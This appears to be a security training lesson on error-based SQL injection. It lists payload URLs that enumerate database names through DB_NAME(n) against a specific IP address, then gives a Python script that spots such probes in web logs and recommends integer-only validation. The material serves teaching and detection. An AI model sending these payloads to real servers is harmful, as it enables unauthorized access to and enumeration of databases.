C1L4: SQL Injection


https://s3.amazonaws.com/infosecaddictsfiles/1-Intro_To_SQL_Intection.pptx

Another quick way to test for SQLI is to remove the parameter value.

Error-Based SQL Injection

http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))--

NOTE: "N" [...]
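
Seen from the server side, every request in this lesson puts something other than a plain integer in the id parameter of bookdetail.aspx: either nothing at all, or a SQL expression that calls DB_NAME with an increasing index. The log check below is an added example, not part of the course material; the log lines, client addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample log entries (client address, request target); not real traffic.
SAMPLE_LOG = [
    ("198.51.100.7", "/bookdetail.aspx?id=2"),
    ("198.51.100.7", "/bookdetail.aspx?id=2%20or%201%20in%20(SELECT%20DB_NAME(0))--"),
    ("198.51.100.7", "/bookdetail.aspx?id=2+or+1+in+(select+db_name(1))--"),
    ("198.51.100.7", "/bookdetail.aspx?id=2%20OR%201%20IN%20(Select%20Db_Name(2))--"),
    ("203.0.113.9", "/bookdetail.aspx?id=15"),
    ("203.0.113.9", "/bookdetail.aspx?id="),
]

# Matches the "in (SELECT DB_NAME(<n>))" shape after URL decoding, any letter case.
DB_NAME_CALL = re.compile(r"\bin\s*\(\s*select\s+db_name\s*\(\s*(\d+)\s*\)", re.I)

def classify(value):
    """Label one decoded id value; the page expects a plain integer."""
    if value == "":
        return "empty", None          # parameter value removed
    if re.fullmatch(r"[0-9]+", value):
        return "ok", None
    match = DB_NAME_CALL.search(value)
    if match:
        return "db_name_probe", int(match.group(1))
    return "non_numeric", None

def summarize(log, param="id"):
    """Per client: counts of suspicious id values and the DB_NAME indexes requested."""
    report = defaultdict(lambda: {"empty": 0, "non_numeric": 0, "db_indexes": []})
    for client, target in log:
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            label, index = classify(value)
            if label == "db_name_probe":
                report[client]["db_indexes"].append(index)
            elif label != "ok":
                report[client][label] += 1
    return dict(report)

if __name__ == "__main__":
    for client, hits in summarize(SAMPLE_LOG).items():
        print(client, hits)
```

A client whose db_indexes list climbs 0, 1, 2, ... is walking the database list one request at a time; the same integer-only test, applied to id before the query is built, is what rejects these values in the application itself.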
